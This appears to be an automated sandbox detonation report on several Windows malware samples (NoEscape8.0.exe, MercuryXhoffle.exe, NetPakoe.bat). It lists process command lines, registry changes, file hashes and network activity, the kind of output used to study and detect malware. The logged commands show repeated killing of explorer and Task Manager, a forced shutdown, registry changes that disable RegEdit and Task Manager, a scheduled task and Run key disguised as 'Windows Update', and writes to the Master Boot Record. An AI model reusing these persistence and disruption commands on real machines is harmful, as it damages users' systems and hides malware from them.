C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{682159d9-c321-47ca-b3f1-30e36b2ec8b9} -Embedding
C:\Windows\explorer.exe
explorer
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\shutdown.exe
shutdown -s -t 60
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\werfault.exe
werfault.exe /hc /shared Global\dda93ae4242b4054bd2dd3ce26335145 /t 3008 /p 2252
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im Task Manager.exe /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\explorer.exe
explorer
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K NetPakoe
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\explorer.exe
explorer
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\system32\taskkill.exe
taskkill /im explorer.exe /F
C:\Windows\explorer.exe
explorer
C:\Windows\explorer.exe
explorer
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3fad855 /state1:0x41c64e6d
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.113.50.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.71.105.51.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat
| MD5 | 6c5a9741a170d3ac2e2c89d3e91ea6ea |
| SHA1 | 7034266eefee8c6437d966f5d91ea82e50e10d59 |
| SHA256 | 4d1a5d2255194f08a772aef2363514890ecd620dfc49e5b701fc8f2e2388e616 |
| SHA512 | 9dcf12e971da1c78d92dd7ff824d50e8487ae61bfb9dcbfea6c38f8ebba22994fde19d825e44f4632aba9e0fc34d75cd87e090b75ed78b51b908128cc22ce29c |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
Analysis: behavioral30
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:36
Platform
win10v2004-20240226-en
Max time kernel
116s
Max time network
205s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\NoEscape8.0.exe | N/A |
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2460 wrote to memory of 568 | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\NoEscape8.0.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2460 wrote to memory of 568 | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\NoEscape8.0.exe | C:\Windows\SysWOW64\cmd.exe |
| PID 2460 wrote to memory of 568 | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\NoEscape8.0.exe | C:\Windows\SysWOW64\cmd.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\NoEscape8.0.exe
"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\NoEscape8.0.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\yourpc\skid.bat" "
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | 196.178.17.96.in-addr.arpa | udp |
| GB | 142.250.200.10:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | 177.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.73.42.20.in-addr.arpa | udp |
Files
C:\yourpc\skid.bat
| MD5 | 427d18145e233d828cdbad04596134c9 |
| SHA1 | 84cb6fae8ee844be1fd9eda8a6a74a5cce97ded8 |
| SHA256 | 23efa2c8b42c0c599a2bd60cadfab2eac3a439e891509dc70c1ee2a9f5e86f2c |
| SHA512 | fd5e0a70a4bd082311ab5559b832ba8ae8fce91a62faeec827e3a14a302ceda3697b2cc4d9f1c082170fe22ffff52b022791ebc8c6ec35a3946a9c3712e99444 |
Analysis: behavioral24
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:35
Platform
win10v2004-20240226-en
Max time kernel
155s
Max time network
186s
Command Line
Signatures
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\MercuryXhoffle.exe | N/A |
Disables Task Manager via registry modification
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\MercuryXhoffle.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bootrec.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Local\\Temp\\bootrec.exe" | C:\Users\Admin\AppData\Local\Temp\bootrec.exe | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\bootrec.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\MercuryXhoffle.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\MercuryXhoffle.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3652 wrote to memory of 4748 | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\MercuryXhoffle.exe | C:\Users\Admin\AppData\Local\Temp\bootrec.exe |
| PID 3652 wrote to memory of 4748 | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\MercuryXhoffle.exe | C:\Users\Admin\AppData\Local\Temp\bootrec.exe |
| PID 3652 wrote to memory of 4748 | N/A | C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\MercuryXhoffle.exe | C:\Users\Admin\AppData\Local\Temp\bootrec.exe |
| PID 4748 wrote to memory of 3224 | N/A | C:\Users\Admin\AppData\Local\Temp\bootrec.exe | C:\Windows\SysWOW64\schtasks.exe |
| PID 4748 wrote to memory of 3224 | N/A | C:\Users\Admin\AppData\Local\Temp\bootrec.exe | C:\Windows\SysWOW64\schtasks.exe |
| PID 4748 wrote to memory of 3224 | N/A | C:\Users\Admin\AppData\Local\Temp\bootrec.exe | C:\Windows\SysWOW64\schtasks.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\MercuryXhoffle.exe
"C:\Users\Admin\AppData\Local\Temp\TrashMalwares-main\MercuryXhoffle.exe"
C:\Users\Admin\AppData\Local\Temp\bootrec.exe
"C:\Users\Admin\AppData\Local\Temp\bootrec.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Create /TN "Windows Update" /ru SYSTEM /SC ONSTART /TR "C:\Users\Admin\AppData\Local\Temp\bootrec.exe"
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x468 0x378
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.71.91.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.73.42.20.in-addr.arpa | udp |
Files
memory/3652-0-0x00007FF957A50000-0x00007FF9583F1000-memory.dmp
memory/3652-1-0x0000000001BE0000-0x0000000001BF0000-memory.dmp
memory/3652-2-0x000000001C5E0000-0x000000001CAAE000-memory.dmp
memory/3652-3-0x000000001CBB0000-0x000000001CC4C000-memory.dmp
memory/3652-4-0x00007FF957A50000-0x00007FF9583F1000-memory.dmp
memory/3652-5-0x0000000001BE0000-0x0000000001BF0000-memory.dmp
memory/3652-6-0x0000000001BE0000-0x0000000001BF0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\bootrec.exe
| MD5 | f14b989516f256db1befee3dee508f55 |
| SHA1 | fbd2c6b1d783debb9a69c5766d3672138e24e127 |
| SHA256 | c88dbbd0002395beaeaef3f855790abef3430d76307953825745339bdc1f9388 |
| SHA512 | bfa84b7837d3bcda55571710289092af7e6cb7ee48b21a2a032d24b495ddbe9259c07eeceb58fb2a5ac4482e2b120259fe5b95162eb632228c86516f41bf035e |
memory/4748-15-0x0000000000400000-0x0000000000433000-memory.dmp
memory/3652-16-0x0000000001BE0000-0x0000000001BF0000-memory.dmp
memory/3652-17-0x000000001C050000-0x000000001C058000-memory.dmp
memory/3652-18-0x0000000001BE0000-0x0000000001BF0000-memory.dmp
memory/3652-19-0x0000000001BE0000-0x0000000001BF0000-memory.dmp
memory/3652-20-0x00007FF957A50000-0x00007FF9583F1000-memory.dmp
memory/3652-21-0x00007FF957A50000-0x00007FF9583F1000-memory.dmp
memory/3652-22-0x0000000001BE0000-0x0000000001BF0000-memory.dmp
memory/3652-23-0x0000000001BE0000-0x0000000001BF0000-memory.dmp
memory/3652-24-0x0000000001BE0000-0x0000000001BF0000-memory.dmp
memory/3652-25-0x0000000001BE0000-0x0000000001BF0000-memory.dmp
memory/3652-27-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-26-0x0000000001BE0000-0x0000000001BF0000-memory.dmp
memory/3652-28-0x0000000001BE0000-0x0000000001BF0000-memory.dmp
memory/3652-29-0x0000000001BE0000-0x0000000001BF0000-memory.dmp
memory/3652-30-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-31-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-32-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-33-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-34-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-35-0x0000000001BE0000-0x0000000001BF0000-memory.dmp
memory/3652-36-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-37-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-38-0x0000000001BE0000-0x0000000001BF0000-memory.dmp
memory/3652-39-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-41-0x0000000001BE0000-0x0000000001BF0000-memory.dmp
memory/3652-40-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-42-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-43-0x0000000001BE0000-0x0000000001BF0000-memory.dmp
memory/3652-44-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-45-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-47-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-46-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-48-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-49-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-50-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-51-0x0000000001BE0000-0x0000000001BF0000-memory.dmp
memory/3652-52-0x0000000001BE0000-0x0000000001BF0000-memory.dmp
memory/3652-53-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-54-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-55-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-56-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-57-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-58-0x0000000001BE0000-0x0000000001BF0000-memory.dmp
memory/3652-59-0x0000000001BE0000-0x0000000001BF0000-memory.dmp
memory/3652-60-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-62-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-61-0x0000000001BE0000-0x0000000001BF0000-memory.dmp
memory/3652-63-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-64-0x0000000001BE0000-0x0000000001BF0000-memory.dmp
memory/3652-66-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-65-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-67-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-68-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-69-0x0000000001BE0000-0x0000000001BF0000-memory.dmp
memory/3652-70-0x0000000001BE0000-0x0000000001BF0000-memory.dmp
memory/3652-71-0x0000000020680000-0x0000000020780000-memory.dmp
memory/3652-72-0x0000000020680000-0x0000000020780000-memory.dmp
Analysis: behavioral25
Detonation Overview
Submitted
2024-03-02 20:26
Reported
2024-03-02 20:33
Platform
win7-20240221-en
Max time kernel
159s
Max time network
167s
Command Line
Signatures
Modifies Installed Components in the registry
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NetPakoe.bat | C:\Windows\system32\cmd.exe | N/A |
